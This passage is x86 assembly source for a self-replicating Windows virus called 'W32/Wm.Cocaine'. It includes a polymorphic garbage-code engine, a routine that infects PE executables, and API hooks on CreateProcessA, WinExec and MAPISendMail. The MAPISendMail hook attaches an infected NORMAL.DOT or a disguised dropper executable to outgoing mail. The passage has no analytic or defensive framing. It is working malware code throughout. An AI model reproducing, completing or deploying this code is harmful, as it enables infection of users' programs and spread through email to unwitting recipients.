0c3h ;no paramz, use RETN @@b: call garble pop esi mov ecx, edi sub ecx, esi ;distance mov [esi-4], ecx ;patch jmp dec by [ebp+(ofs s_into-ofs vcode)] @@1: ret make_subs endp make_call proc cmp by [ebp+(ofs s_into-ofs vcode)], 0 jne @@1 ;cant call while creating sub mov eax, [ebp+(ofs subs_index-ofs vcode)] test eax, eax jz @@1 call random ;choose one of the subs ready mov ecx, 6 cdq mul ecx lea esi, [ebp+eax+(ofs subs_table-ofs vcode)] movzx ecx, by [esi.4] jecxz @@2 ;how much paramz it need? @@3: call gar or al, 50h ;push paramz stosb loop @@3 @@2: mov al, 0e8h stosb ;build call mov eax, dwo [esi] sub eax, edi sub eax,4 stosd ;store displacement @@1: ret make_call endp lea_dword proc mov al, 8dh stosb call get32free shl eax, 3 push eax call gar pop edx or eax, edx or al, 80h stosb call random0 stosd ret lea_dword endp math_byte proc mov eax, 8 call random shl eax, 3 or eax, 1000000011000000b ;make math operation push eax call get8free pop edx jc @@1 or eax, edx xchg al, ah stosw call random0 stosb ;byte @@1: ret math_byte endp math_word proc mov ax, 8166h stosw call _math_imm stosw ret math_word endp math_dword proc mov al, 81h stosb call _math_imm stosd ret math_dword endp _math_imm proc mov eax, 8 call random shl eax, 3 or al, 11000000b push eax call get32free pop edx or eax, edx ;patch reg into stosb call random0 ret _math_imm endp push_pop proc call gar or al, 50h stosb call garble ;recurse into call get32free or al, 58h stosb ret push_pop endp jmpcn proc mov eax, 0fh call random or ax, 0f80h ;jcc near xchg al, ah stosw stosd push edi call garble ;recurse pop esi mov eax, edi sub eax, esi mov dwo [esi-4], eax ;fix jcc ret jmpcn endp jmpcs proc mov eax, 0fh call random or al, 70h ;make jmp conditional stosw push edi call garble ;recurse pop esi push edi mov eax, esi xchg eax, edi sub eax, edi mov by [esi-1], al ;fix jcc or al, al jns @@1 ;jmp destiny too far? mov edi, esi dec edi dec edi call one_byte ;replace with 2 byte instr call one_byte @@1: pop edi ret jmpcs endp jmpn proc mov al, 0e9h stosb mov eax, JMP_MAX call random inc eax mov ecx, eax stosd jmp _shit jmpn endp jmps proc mov eax, JMP_MAX call random inc eax mov ecx, eax mov ah, 0ebh xchg al, ah stosw movzx eax, ah _shit: call random0 ;ecx bytes of shit stosb loop _shit ret jmps endp movr_byte proc call gar push eax call get8free jnc @@1 pop eax ret @@1: push eax mov al, 08ah jmp _reg_reg movr_byte endp movr_word proc mov al, 66h ;word-size prefix stosb movr_word endp movr_dword proc call gar push eax call get32free push eax mov al, 08bh _reg_reg: stosb pop eax ;destino pop edx ;source shl eax, 3 or eax, edx or eax, 11000000b stosb ret movr_dword endp mov_dword proc call get32free or al, 0b8h stosb call random0 stosd ret mov_dword endp mov_word proc mov al, 66h stosb call get32free or al, 0b8h stosb call random0 stosw ret mov_word endp mov_byte proc call get8free jc @@1 or al, 0b0h stosb call random0 stosb @@1: ret mov_byte endp one_byte proc mov eax, 5 call random lea ebx, [ebp+(ofs one_byte_table-ofs vcode)] xlat stosb ret one_byte endp inc_dec proc call get32free add al, 40h call random_f js @@1 or al, 01000b ;inc/dec @@1: stosb ret inc_dec endp mov_zs_x proc call random0 mov eax, 0b60fh js @@1 mov ah, 0beh ;z/s @@1: adc ah, 0 ;16/8 stosw call gar push eax call get32free shl eax, 3 pop edx or eax, edx or al, 0c0h stosb ret mov_zs_x endp one_byte_table equ this byte std clc cmc cld std crypt_table equ this byte db 080h, 030h, 034h ;xor db 0f6h, 010h, 0f6h ;not db 080h, 000h, 02ch ;add db 080h, 028h, 004h ;sub gtable equ this byte dd ofs jmpcn-ofs vcode dd ofs jmpcs-ofs vcode dd ofs jmpn-ofs vcode dd ofs jmps-ofs vcode dd ofs one_byte-ofs vcode dd ofs push_pop-ofs vcode dd ofs push_pop-ofs vcode dd ofs push_pop-ofs vcode dd ofs push_pop-ofs vcode dd ofs inc_dec-ofs vcode dd ofs inc_dec-ofs vcode dd ofs mov_zs_x-ofs vcode dd ofs mov_zs_x-ofs vcode dd ofs math_word-ofs vcode dd ofs math_word-ofs vcode dd ofs movr_word-ofs vcode dd ofs movr_word-ofs vcode dd ofs mov_word-ofs vcode dd ofs mov_word-ofs vcode dd ofs movr_byte-ofs vcode dd ofs movr_byte-ofs vcode dd ofs movr_byte-ofs vcode dd ofs math_byte-ofs vcode dd ofs math_byte-ofs vcode dd ofs math_byte-ofs vcode dd ofs mov_byte-ofs vcode dd ofs mov_byte-ofs vcode dd ofs mov_byte-ofs vcode dd ofs math_dword-ofs vcode dd ofs math_dword-ofs vcode dd ofs math_dword-ofs vcode dd ofs math_dword-ofs vcode dd ofs math_dword-ofs vcode dd ofs math_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs mov_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs movr_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode dd ofs lea_dword-ofs vcode egtable equ this byte ;end of in-memory encripted part title1 db 'W32/Wm.Cocaine', 0 text0 db 'Your life burn faster, obey your master...', 0 text1 db 'Chop your breakfast on a mirror...', 0 text2 db 'Veins that pump with fear, sucking darkest clear...', 0 text3 db 'Taste me you will see, more is all you need...', 0 text4 db 'I will occupy, I will help you die...', 0 text5 db 'I will run through you, now I rule you too...', 0 text6 db "Master of Puppets, I'm pulling your strings...", 0 text_table equ this byte dd ofs text0-ofs vcode dd ofs text1-ofs vcode dd ofs text2-ofs vcode dd ofs text3-ofs vcode dd ofs text4-ofs vcode dd ofs text5-ofs vcode dd ofs text6-ofs vcode Payload: nop ;on/off switch sub ecx, ecx push ecx lea eax, [ebp+(ofs title1-ofs vcode)] push eax mov eax, 7 call random mov eax, [ebp+(ofs text_table-ofs vcode)+eax*4] add eax, ebp push eax ;silly MessageBox payload push ecx call [ebp+(ofs _MessageBoxA-ofs vcode)] ret kernel db 'KERNEL32', 0 user db 'USER32', 0 mapi db 'MAPI32', 0 align 4 sGetProcAddress db 'GetProcAddress', 0 ;APIs from kernel32.dll that sGetModuleHandle db 'GetModuleHandleA', 0 ;we need sCreateProcessA db 'CreateProcessA', 0 sCreateFileA db 'CreateFileA', 0 sWinExec db 'WinExec', 0 sCloseHandle db 'CloseHandle', 0 ;api names, related to other 2 sLoadLibraryA db 'LoadLibraryA', 0 sFreeLibrary db 'FreeLibrary', 0 sCreateFileMappingA db 'CreateFileMappingA', 0 sMapViewOfFile db 'MapViewOfFile', 0 sUnmapViewOfFile db 'UnmapViewOfFile', 0 sFindFirstFileA db 'FindFirstFileA', 0 sFindNextFileA db 'FindNextFileA', 0 sFindClose db 'FindClose', 0 sSetEndOfFile db 'SetEndOfFile', 0 sVirtualAlloc db 'VirtualAlloc', 0 sVirtualFree db 'VirtualFree', 0 sGetSystemTime db 'GetSystemTime', 0 sGetWindowsDirectoryA db 'GetWindowsDirectoryA', 0 sGetSystemDirectoryA db 'GetSystemDirectoryA', 0 sGetCurrentDirectoryA db 'GetCurrentDirectoryA', 0 sSetFileAttributesA db 'SetFileAttributesA', 0 sSetFileTime db 'SetFileTime', 0 sExitProcess db 'ExitProcess', 0 sGetCurrentProcess db 'GetCurrentProcess', 0 sWriteProcessMemory db 'WriteProcessMemory',0 sWriteFile db 'WriteFile', 0 sDeleteFileA db 'DeleteFileA', 0 sSleep db 'Sleep', 0 sCreateThread db 'CreateThread', 0 sGetFileSize db 'GetFileSize', 0 sSetFilePointer db 'SetFilePointer', 0 sMessageBoxA db 'MessageBoxA', 0 ;USER32 functionz sFindWindowA db 'FindWindowA', 0 sPostMessageA db 'PostMessageA', 0 sMAPISendMail db 'MAPISendMail', 0 ConsultKey proc call @@1 @@1v dd 0 @@1: push 000F003Fh ;KEY_ALL_ACCESS push 0 push eax push 80000001H what_key equ dwo $-4 call [ebp+(ofs _RegOpenKeyEx-ofs vcode)] test eax, eax jnz @@0 call @@3 dd 0 @@3: mov edx, [esp] mov dwo [edx], MAX_PATH lea eax, [ebp+(ofs directory-ofs vcode)] mov esi, eax mov [eax], eax push eax push 0 push 0 call @@4 db 0 @@4: push dwo [ebp+(ofs @@1v-ofs vcode)] call [ebp+(ofs _RegQueryValueEx-ofs vcode)] push dwo [ebp+(ofs @@1v-ofs vcode)] call [ebp+(ofs _RegCloseKey-ofs vcode)] ;close key @@0: ret ConsultKey endp align 4 k32_names equ this byte dd (ofs sCreateProcessA-ofs vcode) dd (ofs sCreateFileA-ofs vcode);these are relative pointerz dd (ofs sWinExec-ofs vcode) ;to namez... zero end list dd (ofs sCloseHandle-ofs vcode) dd (ofs sLoadLibraryA-ofs vcode) dd (ofs sFreeLibrary-ofs vcode) dd (ofs sCreateFileMappingA-ofs vcode) dd (ofs sMapViewOfFile-ofs vcode) dd (ofs sUnmapViewOfFile-ofs vcode) dd (ofs sFindFirstFileA-ofs vcode) dd (ofs sFindNextFileA-ofs vcode) dd (ofs sFindClose-ofs vcode) dd (ofs sSetEndOfFile-ofs vcode) dd (ofs sVirtualAlloc-ofs vcode) dd (ofs sVirtualFree-ofs vcode) dd (ofs sGetSystemTime-ofs vcode) dd (ofs sGetWindowsDirectoryA-ofs vcode) dd (ofs sGetSystemDirectoryA-ofs vcode) dd (ofs sGetCurrentDirectoryA-ofs vcode) dd (ofs sSetFileAttributesA-ofs vcode) dd (ofs sSetFileTime-ofs vcode) dd (ofs sExitProcess-ofs vcode) dd (ofs sGetCurrentProcess-ofs vcode) dd (ofs sWriteProcessMemory-ofs vcode) dd (ofs sWriteFile-ofs vcode) dd (ofs sDeleteFileA-ofs vcode) dd (ofs sSleep-ofs vcode) dd (ofs sCreateThread-ofs vcode) dd (ofs sGetFileSize-ofs vcode) dd (ofs sSetFilePointer-ofs vcode) dd 0 dd (ofs sMessageBoxA-ofs vcode) dd (ofs sFindWindowA-ofs vcode) dd (ofs sPostMessageA-ofs vcode) dd 0 DeleteShitFile proc call delta mov ebx, [esp+4] push 80h push ebx call [ebp+(ofs _SetFileAttributesA-ofs vcode)] test eax, eax jz @@1 push ebx call [ebp+(ofs _DeleteFileA-ofs vcode)] @@1: ret 4 DeleteShitFile endp NewMAPISendMail proc push esp ;original MAPISendMail pushad call delta lea eax, [ebp+(ofs mapi-ofs vcode)] push eax call [ebp+(ofs _GetModuleHandle-ofs vcode)] lea ecx, [ebp+(ofs sMAPISendMail-ofs vcode)] push ecx push eax call [ebp+(ofs _GetProcAddress-ofs vcode)] mov [esp+(8*4)], eax ;return address=MAPISendMail mov edi, [esp+(12*4)] ;MAPI Struct cmp dwo [edi.nFileCount], 0 ;file attached? jnz @@3 inc dwo [edi.nFileCount] ;set 1 attachments lea ebx, [ebp+(ofs MF-ofs vcode)] mov [edi.lpFiles], ebx sub eax, eax mov edi, ebx mov ecx, 6 rep stosd ;esi=file structure call OpenAncev jc @@4 ;file dont exists, binary send call GetTemplateDir @@aaa: lodsb test al, al jnz @@aaa call @@aab ndot db '\NORMAL.DOT', 0 @@aab: pop edi xchg edi, esi dec edi @@aac: lodsb stosb test al, al ;we'll send infected NORMAL.DOT jnz @@aac lea esi, [ebp+(ofs directory-ofs vcode)] push 80h push esi call [ebp+(ofs _SetFileAttributesA-ofs vcode)] test eax, eax jz @@4 ;file exists? mov eax, esi mov edx, 'COD' jmp @@5 @@4: call CreateDropper mov eax, [ebp+(ofs mm_on_off-ofs vcode)] push eax ;buffer mov eax, [ebp+(ofs fsizel-ofs vcode)] push eax ;size lea edi, [ebp+(ofs rbuf-ofs vcode)] mov ebx, edi call @@111 shitfile db 'C:\ENIACOC.SYS', 0 @@111: pop esi @@111a: lodsb stosb test al, al jnz @@111a push ebx ;name mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h call WriteDump ;hidden dump push 00004000h+00008000h push 0 push dwo [ebp+(ofs mm_on_off-ofs vcode)] call [ebp+(ofs _VirtualFree-ofs vcode)] lea eax, [ebp+(ofs rbuf-ofs vcode)] mov edx, 'EXE' @@5: lea edi, [ebp+(ofs MF-ofs vcode)] mov [edi.lpszPathName], eax ;set file to send lea esi, [ebp+(ofs rbuf+MAX_PATH-ofs vcode)] mov [edi.lpszFileName], esi xchg edi, esi mov eax, 8 call random inc eax inc eax inc eax mov ecx, eax @@a: mov eax, 23 call random add al, 'A' stosb loop @@a mov al, '.' stosb mov eax, edx stosd @@3: mov dwo [ebp+(ofs mm_on_off-ofs vcode)], 0 popad ret NewMAPISendMail endp NewCreateProcessA proc push esp ;new handler for CreateProcessA pushad call CheckName call delta mov eax, [ebp+(ofs _CreateProcessA-ofs vcode)] mov [esp+(7*4)+4], eax popad ret NewCreateProcessA endp RestoreChunkz db FALSE NewWinExec proc push esp ;new handler for WinExec pushad call CheckName call delta mov eax, [ebp+(ofs _WinExec-ofs vcode)] mov [esp+(7*4)+4], eax popad ret NewWinExec endp ProcessDir proc pushad lea edi, [ebp+(ofs directory-ofs vcode)];edi=dir to process add edi, eax ;eax=size of dir lea esi, [ebp+(ofs FileMask-ofs vcode)] movsd movsd ;copy *.* mask lea eax, [ebp+(ofs find_data-ofs vcode)] push eax lea eax, [ebp+(ofs directory-ofs vcode)] push eax call [ebp+(ofs _FindFirstFileA-ofs vcode)] inc eax jz @@0 ;no file found? dec eax mov [ebp+(ofs search_handle-ofs vcode)], eax @@1: pushad lea esi, [ebp+(ofs directory-ofs vcode)] sub eax, eax mov edx, esi @@3: lodsb cmp al, '\' ;search last slash jne @@5 mov edx, esi ;update slash position @@5: test al, al jnz @@3 lea esi, [ebp+(ofs filename-ofs vcode)] mov edi, edx @@4: lodsb cmp al, 'V' je @@6 cmp al, 'v' je @@6 cmp al, '0' jb @@4a cmp al, '9' jbe @@6 @@4a: stosb test al, al ;copy name to path jnz @@4 mov eax, dwo [edi-4] or eax, 202020h not eax xor eax, not 'exe' jz @@7 xor eax, ((not 'rcs')xor(not 'exe')) jnz @@6 ;tricky, isnt? :) @@7: call Infect @@6: ;process it popad lea eax, [ebp+(ofs find_data-ofs vcode)] push eax mov eax, [ebp+(ofs search_handle-ofs vcode)] push eax call [ebp+(ofs _FindNextFileA-ofs vcode)] test eax, eax ;no more files in this dir? jne @@1 @@2: push dwo [ebp+(ofs search_handle-ofs vcode)] call [ebp+(ofs _FindClose-ofs vcode)] ;close search @@0: popad ret ProcessDir endp peh_machine = 4 peh_nosections = 6 peh_ntheader = 20 peh_flags = 22 peh_initdata = 32 peh_entrypoint = 40 peh_imagebase = 52 peh_imagesize = 80 peh_chksum = 88 peh_reloc1 = 160 peh_reloc2 = 164 seh_rvasz = 8 seh_rva = 12 seh_rawsz = 16 seh_raw = 20 seh_attr = 36 Infect proc ;infect PE filez mov eax, [ebp+(ofs seed-ofs vcode)] mov [ebp+(ofs pseed-ofs vcode)], eax mov ecx, DIV_VALUE call set_new_eh mov esp,[esp+8] ;fix stack _remove_seh: jmp remove_seh db 0EAh set_new_eh: sub edx, edx push dwo fs:[edx] mov fs:[edx], esp ;set SEH mov by [ebp+(ofs inf?-ofs vcode)], dl cmp [ebp+(ofs fsizeh-ofs vcode)], edx jne _remove_seh ;too big? mov eax, [ebp+(ofs fsizel-ofs vcode)] cmp dwo [ebp+(ofs mm_on_off-ofs vcode)], 0 jnz @@5 ;skip size check for droppers test eax, eax jz @@5a cmp eax, 16*1024 jbe _remove_seh ;smaller than 16kb? @@5: div ecx test edx, edx ;padded to 101 boundary? jz _remove_seh @@5a: call MapFile ;map file mov ecx, eax mov ebx, eax jecxz _remove_seh ;error mapping mov [ebp+(ofs map@-ofs vcode)], eax cmp wo [ecx], 'ZM' ;EXE file? jne @@0 cmp wo [ecx+18h], 40h jne @@0 mov edi, [ecx+3ch] add edi, ecx mov [ebp+(ofs pe_header-ofs vcode)], edi cmp dwo [edi], 'EP' ;PE EXE file? jne @@0 cmp wo [edi+peh_machine], 014Ch ;i386? jne @@0 movzx eax, wo [edi+peh_flags] not al test eax, 2002h jnz @@0 ;isnt DLL? is executable? mov esi, edi movzx ecx, wo [edi+peh_nosections] cmp ecx, 3 jb @@0 ;too few sections dec ecx mov eax, ecx shl eax, 3 shl ecx, 5 add eax, ecx movzx ecx, wo [edi+peh_ntheader] add eax, 24 add eax, ecx ;esi=pe header add edi, eax ;edi=section header bt dwo [edi.seh_attr], 6 ;must be init data jnc @@0 pushad mov eax, [esi+peh_entrypoint] mov [ebp+(ofs old_eip-ofs vcode)], eax ;copy entrypoint mov edi, esi movzx ecx, wo [edi+peh_ntheader] add ecx, 24 add edi, ecx ;edi=first section header mov eax, [edi+seh_rva] mov [ebp+(ofs sRVA-ofs vcode)], eax mov eax, [edi+seh_rawsz] mov [ebp+(ofs RawSize-ofs vcode)], eax ;set vars for branch_entry mov ecx, [esi+132] mov eax, [edi+seh_rva] add eax, [edi+seh_rvasz] mov ebx, [esi+128] sub eax, ebx jc @@not_in_1st ;IT start after end of 1st sec cmp ecx, eax ja @@set_it xchg eax, ecx jmp @@set_it @@not_in_1st: sub ecx, ecx @@set_it: mov [ebp+(ofs it_size-ofs vcode)], ecx push 00000040h push 00002000h+00001000h+00100000h push 32*1024 push 0 call [ebp+(ofs _VirtualAlloc-ofs vcode)] mov [ebp+(ofs buffer2-ofs vcode)], eax push 00000040h push 00002000h+00001000h+00100000h push 32*1024 push 0 call [ebp+(ofs _VirtualAlloc-ofs vcode)] mov [ebp+(ofs buffer1-ofs vcode)], eax ;alloc 2 bufferz for poly mov edi, eax mov esi, ebp mov ecx, vsize rep movsb ;init first buffer popad lea eax, [ebp+(ofs kernel-ofs vcode)] ;search in kernel32 mov [ebp+(ofs dll_name-ofs vcode)], eax lea eax, [ebp+(ofs sGetProcAddress-ofs vcode)] call SearchIT push eax ;push GetProcAdress lea eax, [ebp+(ofs sGetModuleHandle-ofs vcode)] call SearchIT push eax ;push GetModuleHandleA lea eax, [ebp+(ofs sCreateProcessA-ofs vcode)] call SearchIT push eax ;push CreateProcessA lea eax, [ebp+(ofs sWinExec-ofs vcode)] call SearchIT push eax ;push WinExec lea eax, [ebp+(ofs mapi-ofs vcode)] ;search in mapi32 mov [ebp+(ofs dll_name-ofs vcode)], eax lea eax, [ebp+(ofs sMAPISendMail-ofs vcode)] call SearchIT push eax ;push MAPISendMail sub ecx, ecx mov edx, [edi+seh_rva] add edx, [edi+seh_rawsz] ;rva+raw size=ep mov [ebp+(ofs ep-ofs vcode)], edx mov ecx, [esi+peh_imagebase] add edx, ecx ;ep+base=delta run mov eax, [esi+peh_entrypoint] mov esi, [ebp+(ofs buffer1-ofs vcode)] mov edi, [ebp+(ofs buffer2-ofs vcode)] mov [esi+(ofs _delta-ofs vcode)], edx ;set delta in copy mov [esi+(ofs _base-ofs vcode)], ecx sub eax, [ebp+(ofs ep-ofs vcode)] sub eax, 4+(ofs host_entry-ofs vcode) mov [esi+(ofs host_entry-ofs vcode)], eax ;set entrypoint in copy pop eax mov [esi+(ofs OldMAPISendMail-ofs vcode)], eax pop eax mov [esi+(ofs OldWinExec-ofs vcode)], eax pop eax mov [esi+(ofs OldCreateProcessA-ofs vcode)], eax pop eax mov [esi+(ofs OldGetModuleHandleA-ofs vcode)], eax pop eax mov [esi+(ofs OldGetProcAddress-ofs vcode)], eax mov by [esi+(ofs RestoreChunkz-ofs vcode)], FALSE cmp dwo [ebp+(ofs RawSize-ofs vcode)], MIN_RAW jb @@a pushad lea edi, [esi+(ofs rbuf-ofs vcode)] ;start of restoration table push edi mov ecx, (MAX_BRANCH*(128+4+4))/4 @@be0: call random0 ;fill buffer with garbage stosd loop @@be0 sub eax, eax mov [ebp+(ofs reg32-ofs vcode)], eax ;init internal vars mov [ebp+(ofs lparm-ofs vcode)], eax mov [ebp+(ofs lvars-ofs vcode)], eax mov [ebp+(ofs subs_index-ofs vcode)], eax mov [ebp+(ofs s_into-ofs vcode)], eax ;allow call mov by [ebp+(ofs recurse-ofs vcode)], MAX_RECURSION-2 pop edi mov eax, [ebp+(ofs old_eip-ofs vcode)] ;first chunk at sub ecx, ecx ;counter @@be1: inc ecx ;chunk count stosd ;starting RVA stosd ;(make space for size) call virtual2physical_ or eax, eax jz @@fux0red mov esi, eax add esi, [ebp+(ofs map@-ofs vcode)] push ecx mov ecx, 128 push esi edi rep movsb ;copy bytes at chunk pop esi edi pop ecx lea ebx, [edi-5] call crypt_poly call garble ;make junk call crypt_poly mov [esi-4], edi ;(destine sub [esi-4], ebx ;- previous destine(b4 junk)) ;==size mov al, 0e9h stosd stosb ;make JMP pushad ;choose a suitable EIP for next @@ce0: ;chunk(not overlapping) mov eax, [ebp+(ofs RawSize-ofs vcode)] sub eax, 12345678h it_size equ dwo $-4 call random add eax, [ebp+(ofs sRVA-ofs vcode)] ;eip=rnd(rva)+base sub edx, edx sub ebx, ebx ;init ok_counter,checked_counter lea edi, [ebp+(ofs rbuf-ofs vcode)] @@ce1: mov esi, [edi] add esi, [edi+4] ;entrypoint is above the end(point+sz) cmp eax, esi ;last one, so, is valid(for dis entry) ja @@ce3 mov esi, [edi] ;entrypoint is below current one - 129 sub esi, 129 ;so, it have enought room to grown, ok cmp eax, esi jnb @@ce2 @@ce3: inc edx ;this one is ok @@ce2: add edi, [edi+4] ;update pointer to next chunk info add edi, 4*2 inc ebx cmp ecx, ebx ;all entries checked? no, continue jne @@ce1 cmp ecx, edx ;eip allowed for all our entries? jne @@ce0 mov [esp+(7*4)], eax ;fix eax(stack) popad push eax call virtual2physical_ add eax, [ebp+(ofs map@-ofs vcode)] mov ebx, edi sub eax, ebx ;calc distance between chunks mov [edi-4], eax ;patch JMP lea eax, [edi-4] ;last patcheable jump sub eax, [ebp+(ofs map@-ofs vcode)] mov [ebp+(ofs patch_jump-ofs vcode)], eax mov edi, esi add edi, [edi-4] ;edi(table)=edi+2 dwords+junk ;(cut excess copied bytes) pop eax cmp ecx, MAX_BRANCH ;process next chunk jb @@be1 popad mov by [esi+(ofs RestoreChunkz-ofs vcode)], TRUE @@a: pushad mov edi, esi mov eax, [ebp+(ofs key1-ofs vcode)] mov ecx, (ofs dec_end_code-ofs vcode)/4 @@loop1: xor [edi], eax ;do 2nd loop(internal) scasd add eax, [ebp+(ofs key2-ofs vcode)] loop @@loop1 popad mov eax, (ofs DecriptInit-ofs vcode) ;where our code get control mov ecx, vsize call mutate ;encript mov by [ebp+(ofs inf?-ofs vcode)], -1 ;set continue infecting mov [ebp+(ofs polybuffer-ofs vcode)], edi add [ebp+(ofs ep-ofs vcode)], eax ;add poly entry to file entry cmp ecx, msize ;if poly decriptorz dont fill jnb @@3 ;bufferz, make it bufsize long mov ecx, msize @@3: mov [ebp+(ofs tamanho-ofs vcode)], ecx @@0: call UnmapFile @@1: movzx eax, by [ebp+(ofs inf?-ofs vcode)] or eax, eax mov by [ebp+(ofs inf?-ofs vcode)], 0 ;continue processing? jz remove_seh mov eax, [ebp+(ofs tamanho-ofs vcode)] add eax, [ebp+(ofs fsizel-ofs vcode)] call AlignD ;round mapsize to infected mov [ebp+(ofs fsizel-ofs vcode)], eax ;mark call MapFile or eax, eax ;error mapping(all is fux0red) jz @@1 mov ebx, eax mov [ebp+(ofs map@-ofs vcode)], eax add eax, [eax+3ch] mov esi, eax mov edi, eax mov [ebp+(ofs pe_header-ofs vcode)], edi movzx ecx, wo [esi+peh_nosections] dec ecx mov eax, ecx shl eax, 3 shl ecx, 5 add eax, ecx movzx ecx, wo [esi+peh_ntheader] add eax, ecx sub ecx, ecx ;esi=pe header add eax, 24 ;ebx=map base add edi, eax ;edi=last section header mov [esi+peh_reloc1], ecx mov [esi+peh_reloc2], ecx ;no more relocz push edi esi xchg edi, esi mov edi, [esi+seh_raw] add edi, [esi+seh_rawsz] cmp dwo [ebp+(ofs RawSize-ofs vcode)], MIN_RAW jb @@11 pushad mov edi, [ebp+(ofs patch_jump-ofs vcode)] mov eax, edi add edi, ebx call physical2virtual_ ;get rva of jump immediate mov ebx, eax mov eax, [ebp+(ofs ep-ofs vcode)] sub eax, ebx ;sub it from new eip sub eax, 4 mov [edi], eax ;patch jmp popad jmp @@12 @@11: mov eax, [ebp+(ofs ep-ofs vcode)] ;get new eip mov esi, [esp] mov [esi+peh_entrypoint], eax ;set it in pe header @@12: add edi, ebx ;edi=raw ofs+raw sz+mbase mov esi, [ebp+(ofs polybuffer-ofs vcode)] mov edx, [ebp+(ofs tamanho-ofs vcode)] mov ecx, edx cld rep movsb ;zopy vilus codle pop esi edi mov [esi+peh_chksum], ecx ;zero checksum mov eax, edx add eax, [esi+peh_initdata] ;init data size+vsize call AlignF mov [esi+peh_initdata], eax mov [edi+seh_attr], 80000000h+40000000h+00000040h ;NT COMPATIBILITY ZONE ;all to make pe infection NT compliant is here ;hehe... you also must get the APIs right, of course push dwo [ebp+(ofs fsizel-ofs vcode)] push ebx mov eax, [edi+seh_rawsz] mov ebx, [edi+seh_rvasz] ; mov edx, [ebp+(ofs tamanho-ofs vcode)] add eax, edx add ebx, edx ;increase raw/virtual size call AlignF mov [edi+seh_rawsz], eax ;save aligned raw size xchg eax, ebx call AlignO ;align virtual size cmp eax, ebx jnb @@4 ;is below raw size? mov eax, ebx call AlignO ;then use raw size, realigned @@4: mov [edi+seh_rvasz], eax ;save aligned virtual size mov eax, [edi+seh_rvasz] ;calculate last memory occuped add eax, [edi+seh_rva] call AlignO ;align cmp eax, [esi+peh_imagesize] ;is bigger than previous one? jb @@aa mov [esi+peh_imagesize], eax ;if so, fix imagesize @@aa: call ChecksumMappedFile mov [esi+peh_chksum], eax push 00004000h+00008000h push 0 push dwo [ebp+(ofs buffer1-ofs vcode)] call [ebp+(ofs _VirtualFree-ofs vcode)] push 00004000h+00008000h push 0 push dwo [ebp+(ofs buffer2-ofs vcode)] call [ebp+(ofs _VirtualFree-ofs vcode)] ;free bufferz mov by [ebp+(ofs inf?-ofs vcode)], 0 jmp @@0 @@fux0red: popad jmp @@a wavp db 'AVP Monitor',0 ;inserted in middle of code ;) remove_seh: sub edx, edx pop dwo fs:[edx] ;remove frame pop edx ret Infect endp AlignD proc push ebp edx mov ebp, DIV_VALUE jmp _align AlignD endp AlignO proc push ebp edx mov ebp, [esi+56] jmp _align AlignO endp AlignF proc push ebp edx mov ebp, [esi+60] _align: sub edx, edx div ebp test edx, edx jz @@1 inc eax sub edx, edx @@1: mul ebp pop edx ebp ret AlignF endp WriteMem proc push 0 ;result push ecx ;size push esi ;buffer from push edi ;where write call [ebp+(ofs _GetCurrentProcess-ofs vcode)] push eax ;handle to process call [ebp+(ofs _WriteProcessMemory-ofs vcode)] ret WriteMem endp cp_key db 0 GetList proc lea edi, [ebp+(ofs directory-ofs vcode)] push MAX_PATH push edi call [ebp+(ofs _GetSystemDirectoryA-ofs vcode)] lea edi, [edi+eax] call @@1 db '\BRSCBC.DAT', 0 @@1: pop esi @@2: lodsb stosb test al, al jnz @@2 ret GetList endp CheckList proc push eax call GetList mov dwo [ebp+(ofs fsizel-ofs vcode)], 1*4 inc by [ebp+(ofs mf_mode-ofs vcode)] inc by [ebp+(ofs mf_mode1-ofs vcode)] call MapFile mov [ebp+(ofs map@-ofs vcode)], eax dec by [ebp+(ofs mf_mode-ofs vcode)] dec by [ebp+(ofs mf_mode1-ofs vcode)] mov edi, eax test eax, eax pop eax jz @@1 mov ecx, [ebp+(ofs fsizel-ofs vcode)] shr ecx, 2 repne scasd push ecx call UnmapFile pop eax @@1: ret CheckList endp InsertList proc call GetList sub eax, eax push eax push 80h push 3 push eax eax push 0c0000000h ;read/write lea eax, [ebp+(ofs directory-ofs vcode)] push eax call [ebp+(ofs _CreateFileA-ofs vcode)] inc eax jz @@1 dec eax push eax sub ecx, ecx push 2 push ecx push ecx push eax call [ebp+(ofs _SetFilePointer-ofs vcode)] mov eax, [esp] push 0 call @@2 dd 0 @@2: push 4 lea ecx, [ebp+(ofs email_crc-ofs vcode)] push ecx push eax call [ebp+(ofs _WriteFile-ofs vcode)] call [ebp+(ofs _CloseHandle-ofs vcode)] @@1: ret InsertList endp ChecksumMappedFile proc push ebp mov ebp, esp push esi push ecx push edx xor edx, edx mov esi, [ebp+8] mov ecx, [ebp+12] shr ecx, 1 @@1: movzx eax, wo [esi] add edx, eax mov eax, edx and edx, 0FFFFh shr eax, 10h add edx, eax add esi, 2 loop @@1 mov eax, edx shr eax, 10h add ax, dx add eax, [ebp+12] pop edx pop ecx pop esi leave retn 8 ChecksumMappedFile endp SearchIT proc pushad call sne mov esp,[esp+8] ;fix stack _rseh: sub eax, eax ;signal not found jmp rseh sne: sub edx, edx push dwo fs:[edx] mov fs:[edx], esp ;set SEH call gpa_kernel32 ;get add for the case it is bound mov edi, eax mov eax, dwo [esi+128] ;import dir push edi call virtual2physical pop edi jc @@3 mov edx, eax add edx, ebx @@2: cmp dwo [edx], 0 je @@3 mov eax, [edx+12] ;get module name push edi call virtual2physical pop edi jc @@0 add eax, ebx mov ecx, 12345678h 